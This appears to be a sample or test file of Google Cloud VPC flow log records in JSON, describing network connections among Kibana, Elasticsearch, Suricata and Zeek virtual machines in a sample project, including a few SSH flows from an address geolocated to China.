+{"insertId":"bxuq05fhgmw8v","jsonPayload":{"bytes_sent":"9800","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33568},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789269849Z","packets_sent":"120","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.455711202Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw8z","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":58026},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:09.114674887Z","packets_sent":"7","reporter":"DEST","rtt_msec":"40","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:08.995009558Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw9b","jsonPayload":{"bytes_sent":"19506","connection":{"dest_ip":"10.87.40.76","dest_port":33564,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597223164Z","packets_sent":"180","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866699945Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw8y","jsonPayload":{"bytes_sent":"1496","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":32882},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:07.811355936Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:07.689331553Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw9e","jsonPayload":{"bytes_sent":"155675","connection":{"dest_ip":"192.168.2.177","dest_port":60126,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.101129310Z","packets_sent":"288","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.019841536Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw98","jsonPayload":{"bytes_sent":"1791","connection":{"dest_ip":"67.43.156.13","dest_port":32882,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:07.811355936Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:07.689331553Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw96","jsonPayload":{"bytes_sent":"28304484","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":39568},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:02.085146013Z","packets_sent":"2400","reporter":"DEST","rtt_msec":"15","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:00.480787267Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw99","jsonPayload":{"bytes_sent":"2962242","connection":{"dest_ip":"67.43.156.13","dest_port":39568,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:02.085146013Z","packets_sent":"1340","reporter":"SRC","rtt_msec":"15","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.480787267Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw93","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.168.2.117","dest_port":58026,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:09.114674887Z","packets_sent":"7","reporter":"SRC","rtt_msec":"40","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:08.995009558Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw9f","jsonPayload":{"bytes_sent":"9611","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33874},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933323342Z","packets_sent":"101","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510575555Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw9j","jsonPayload":{"bytes_sent":"318481","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33564},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597223164Z","packets_sent":"181","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866699945Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw97","jsonPayload":{"bytes_sent":"139359","connection":{"dest_ip":"10.87.40.76","dest_port":33874,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933323342Z","packets_sent":"70","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510575555Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw9i","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":60640},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:50.942543211Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:50.830164366Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw9c","jsonPayload":{"bytes_sent":"45","connection":{"dest_ip":"67.43.156.14","dest_port":41818,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"end_time":"2019-06-14T03:43:16.809366809Z","packets_sent":"9","reporter":"SRC","rtt_msec":"1350","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:11.031370298Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw9h","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.13","dest_port":60640,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:50.942543211Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:50.830164366Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw92","jsonPayload":{"bytes_sent":"358920","connection":{"dest_ip":"10.87.40.76","dest_port":33966,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"61","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510534141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw8u","jsonPayload":{"bytes_sent":"653827","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.14","src_port":53104},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:45.312543839Z","packets_sent":"286","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.188944581Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw9g","jsonPayload":{"bytes_sent":"5220","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33966},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"81","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510534141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw91","jsonPayload":{"bytes_sent":"31140","connection":{"dest_ip":"10.87.40.76","dest_port":33524,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461240929Z","packets_sent":"40","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.789945697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw95","jsonPayload":{"bytes_sent":"1610630","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.168.2.177","src_port":60126},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.101129310Z","packets_sent":"509","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.019841536Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw9a","jsonPayload":{"bytes_sent":"37145","connection":{"dest_ip":"67.43.156.14","dest_port":53104,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:45.312543839Z","packets_sent":"158","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.188944581Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"198begsfh44xy3","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":53972},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:20.748121914Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:20.634231041Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxt","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":58100},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:20.632737426Z","packets_sent":"7","reporter":"DEST","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:20.512264850Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xy8","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.168.2.117","dest_port":58100,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:20.632777660Z","packets_sent":"7","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:20.512407536Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xy9","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.14","dest_port":60756,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:11.032929292Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:10.912193869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxr","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"67.43.156.14","src_port":14236},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:12.064908439Z","packets_sent":"3","reporter":"DEST","src_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"start_time":"2019-06-14T03:40:08.247072525Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xy2","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.13","dest_port":60122,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:39.207635184Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:39.087226326Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xy6","jsonPayload":{"bytes_sent":"1782","connection":{"dest_ip":"67.43.156.13","dest_port":53972,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:20.748121914Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:20.634231041Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxx","jsonPayload":{"bytes_sent":"68545","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33530},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.205089801Z","packets_sent":"368","reporter":"DEST","rtt_msec":"163","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140301693Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} 